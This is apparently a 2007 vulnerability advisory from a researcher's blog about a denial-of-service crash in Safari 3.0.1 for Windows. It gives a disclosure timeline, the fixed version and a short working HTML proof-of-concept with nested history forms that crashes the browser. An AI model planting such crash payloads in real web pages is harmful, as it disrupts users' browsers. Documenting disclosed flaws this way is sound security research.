############################################
Safari 3.0.1 (552.12.2) for windows corefoundation.dll DoS
Vendor Url:www.apple.com/safari/
Advisore:http://lostmon.blogspot.com/2007/06/
safari-301-552122-for-windows.html
Vendor notify:yes exploit available:yes
BID:http:24497
###########################################
Safari contains a flaw that may allow a remote denial of service.
The issue is triggered when specially crafted input is processed
by the web browser. The crashes occur due to issues with the
functions to manage the History and all History,and will result
in loss of availability for the application.I don´t know if this
can execute arbitrary code.
#############
versions:
#############
Safari 3.0.1
###########
solution:
###########
Update to version 3.0.2
##########
timeline:
##########
discovered:14-06.2007
vendor notify:15-06-2007
vendor response:
disclosure:16-06-2007
#####################
details of the crash
#####################
see the screen shoot:
http://www.spymac.com/upload/2007/06/15/iBvYpCnJFW.gif
--
Crash !
AppName: safari.exe AppVer: 3.522.12.2 ModName: corefoundation.dll
ModVer: 1.434.6.0 Offset: 000097cd
#################
Safari Crash Poc
#################
save this file as html document and open it in safari
put some number in the second form and safai crash.
<html><Title>Safari 3.0.1 beta for windows Crash Poc By Lostmon</title>
<body>
<p>Safari 3.0.1 beta for windows Crash Poc By Lostmon (Lostmon@Gmail.com )</p>
<p> Put some number in the second form for crash Safari</p>
<form id="historyForm1" method="GET" action="#">
<input type="text" id="currentIndex1" name="currentIndex" value="sss">
<textarea id="historyLocation1" name="historyLocation"></textarea>
<form id="historyForm2" method="GET" action="#">
<input type="text" id="currentIndex2" name="currentIndex">
<textarea id="historyLocation2" name="historyLocation"></textarea>
</form></form></body></html>
#################### €nd #####################
Thnx to estrella to be my ligth
Thnx to all Lostmon´s Groups
Thnx to all Who belive in me !!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)